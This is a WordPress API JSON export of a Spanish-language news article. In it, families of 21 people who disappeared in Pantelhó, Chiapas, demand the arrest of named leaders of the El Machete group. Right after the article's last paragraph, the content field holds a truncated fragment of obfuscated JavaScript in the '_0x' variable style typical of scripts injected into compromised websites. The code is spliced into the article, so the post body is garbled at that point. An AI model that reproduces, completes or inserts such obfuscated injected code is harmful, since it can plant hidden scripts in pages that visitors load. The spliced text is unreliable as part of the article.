{"id":3479,"date":"2022-07-06T02:02:41","date_gmt":"2022-07-06T02:02:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3479"},"modified":"2022-07-06T02:02:46","modified_gmt":"2022-07-06T02:02:46","slug":"piden-detencion-de-los-lideres-del-machete","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3479","title":{"rendered":"Piden detenci\u00f3n de los l\u00edderes del Machete"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20211008-WA0151-1024x576.jpg\" alt=\"\" class=\"wp-image-3480\" width=\"427\" height=\"240\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20211008-WA0151-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20211008-WA0151-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20211008-WA0151-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20211008-WA0151.jpg 1280w\" sizes=\"auto, (max-width: 427px) 100vw, 427px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. &#8211; \u201cExigimos sean detenidos Javier M\u00e9ndez Velasco, Daniel L\u00f3pez M\u00e9ndez, Reynaldo P\u00e9rez Ruiz, Juan M\u00e9ndez G\u00f3mez y Abraham Gonzales Guti\u00e9rrez, Juan M\u00e9ndez G\u00f3mez, Juan Ricardo Luna L\u00f3pez , Abraham Gonz\u00e1lez Guti\u00e9rrez, Yoni Hern\u00e1ndez  (entre otros), responsables del secuestro y desaparici\u00f3n de los 21 personas en Pantelh\u00f3\u201d. As\u00ed lo se\u00f1alaron en un escrito, familiares de los 21 desaparecidos en Pantelh\u00f3 el 26 de julio de 2021 volvieron a exigir v\u00eda un escrito dirigido a los medios de comunicaci\u00f3n, que el grupo paramilitar El Machete sea desarticulado y sus l\u00edderes sean detenidos. En el escrito relata parte de los 11 meses que llevan sufriendo por no ver a sus familiares y con la incertidumbre si se encuentran con vida o no, y recalcan que lo peor es que en varios medios y redes sociales han denigrado y revictimizado a los 21 desaparecidos. &#8220;En un pa\u00eds con cientos de desaparecidos, la desaparici\u00f3n forzada de cualquier persona es un hecho lamentable pero sobre todo condenable en cualquier contexto y las v\u00edctimas no pueden ni deben ser revictimizadas&#8221;, aseguran. Asimismo, enviaron un mensaje a las organizaciones sociales y defensores de derechos humanos, que se encuentran protegiendo a quienes tuvieron que ver con la desaparici\u00f3n de las 21 personas, para que no intervengan, ya que se encuentran entorpeciendo e intimidando a las autoridades para que no hagan justicia. &#8220;Tenemos el derecho a conocer la verdad sobre las circunstancias de la desaparici\u00f3n forzada de nuestros 21 familiares, ha sido demasiado doloroso lo que hemos pasado y vivido como para seguir viendo los se\u00f1alamientos dolosos, solo exigimos justicia y que la desaparici\u00f3n forzada que fue un acto premeditado, doloso, perverso e inhumano no quede impune y se castigue sea quien sea, sin importar el puesto pol\u00edtico o religioso&#8221;, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas. &#8211; \u201cExigimos sean detenidos Javier M\u00e9ndez Velasco, Daniel L\u00f3pez M\u00e9ndez, Reynaldo P\u00e9rez Ruiz, Juan M\u00e9ndez G\u00f3mez y Abraham Gonzales Guti\u00e9rrez, Juan M\u00e9ndez G\u00f3mez, Juan Ricardo Luna L\u00f3pez , Abraham Gonz\u00e1lez Guti\u00e9rrez, Yoni Hern\u00e1ndez (entre otros), responsables del secuestro y desaparici\u00f3n de los 21 personas en Pantelh\u00f3\u201d. As\u00ed lo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3480,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3479","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3479"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3479\/revisions"}],"predecessor-version":[{"id":3481,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3479\/revisions\/3481"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3480"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}